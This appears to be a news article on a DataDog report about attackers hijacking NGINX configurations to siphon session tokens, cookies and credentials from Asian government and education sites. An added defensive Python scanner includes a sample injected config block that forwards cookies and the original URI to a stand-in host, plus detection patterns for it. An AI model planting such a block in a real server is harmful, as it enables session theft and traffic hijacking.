- DataDog reports attackers hijacking NGINX configurations to redirect traffic through malicious infrastructure
- The campaign targets the government and education sectors in Asia and allows the theft of session tokens, cookies and credentials.
- Hijacked traffic used for phishing, malware injection, ad fraud, and additional proxy attacks.
Experts have warned that cybercriminals are targeting NGINX servers and diverting legitimate traffic through their malicious infrastructure.
Security researchers at DataDog Security Labs found that attackers primarily focus on Asian targets in the government and education industries.
NGINX is web server and reverse proxy software that sits in front of websites or applications and handles incoming web traffic. It serves content, balances loads, and routes requests to the appropriate backend servers, which is why a tampered configuration gives an attacker a vantage point over every request passing through.
What to do with stolen data
In the attack, anonymous threat actors modify NGINX configuration files and inject malicious blocks that capture incoming requests. They then rewrite them to include the original URL and forward the traffic to the domains under their control. According to DataDog, this is a five-stage attack that begins with a configuration injection and ends with data exfiltration.
Since no software vulnerability is exploited and victims still end up on the pages they requested, the hijack is easy to miss. Still, cybercriminals get away with valuable information that can be used in different ways.
Because request headers are preserved when traffic is forwarded, the attacker can collect IP addresses, user agents, referrers, session tokens, cookies, and sometimes credentials or API keys if they appear in requests. On government or .edu sites, that data is especially valuable.
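A defender-side check that follows from the technique described above, added here as an example and not part of the original report or of DataDog's tooling: it scans an NGINX configuration for location blocks that forward traffic to a host outside an allowlist, and additionally flags the two behaviours the campaign depends on, re-attaching the original request URI and passing the Cookie header along. The sample configuration, the `collector.invalid` host and the `ALLOWED_UPSTREAMS` list are constructed for illustration.

```python
import re

# Constructed sample nginx config (not from the DataDog report): one legitimate
# upstream block and one injected block that captures requests under /login,
# appends the original URI, and forwards them to an attacker-controlled host.
SAMPLE_CONFIG = """
server {
    listen 80;
    server_name portal.example.edu;

    location /api/ {
        proxy_pass http://10.0.0.5:8080;
    }

    location ~ ^/login {
        proxy_set_header Host $host;
        proxy_set_header Cookie $http_cookie;
        proxy_pass http://collector.invalid$request_uri;
    }
}
"""

# Hosts the config is allowed to forward to (assumption: maintained by the defender).
ALLOWED_UPSTREAMS = {"10.0.0.5", "localhost", "127.0.0.1"}

# Simple block matcher; does not handle nested blocks (e.g. "if {...}") inside a location.
LOCATION_RE = re.compile(r"location\s+([^{]+)\{(.*?)\}", re.S)
# Directives that can send a request elsewhere: proxy_pass, a 30x return, or a rewrite.
TARGET_RE = re.compile(r"(proxy_pass|return\s+30[1278]|rewrite\s+\S+)\s+(\S+)")
HOST_RE = re.compile(r"https?://([^/:$;]+)")

def find_suspicious_locations(config, allowed=ALLOWED_UPSTREAMS):
    """Return (location, directive, target_host, reasons) for every location
    block that forwards traffic to a host outside the allowlist."""
    findings = []
    for match in LOCATION_RE.finditer(config):
        path, body = match.group(1).strip(), match.group(2)
        for directive, target in TARGET_RE.findall(body):
            host = HOST_RE.search(target)
            if host is None or host.group(1) in allowed:
                continue  # relative target or a known upstream: nothing to flag
            reasons = ["external-forward"]
            if "$request_uri" in target or "$uri" in target:
                reasons.append("original-url-appended")  # victim still lands on the page they asked for
            if re.search(r"proxy_set_header\s+Cookie", body):
                reasons.append("cookie-forwarded")  # session tokens travel with the request
            findings.append((path, directive.split()[0], host.group(1), reasons))
    return findings
```

Run the function over the live config files (and compare against a known-good copy) on a schedule, since the campaign relies on the modified file staying in place unnoticed.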
They can also manipulate content selectively. Since only certain URL paths are hijacked, the attacker can inject fake ads, phishing pages, malware downloads, or login requests only when desired, successfully targeting specific users, regions, or time zones.
Then, there is the option of monetizing and reselling traffic. Real, clean user traffic routed through the attacker’s infrastructure can be sold for ad fraud, SEO manipulation, click fraud, or used to power other malicious services, which is a common practice in large-scale proxy ecosystems.
Finally, compromised NGINX servers can be used to perform proxy attacks against other targets, effectively masking their origins.
Via BleepingComputer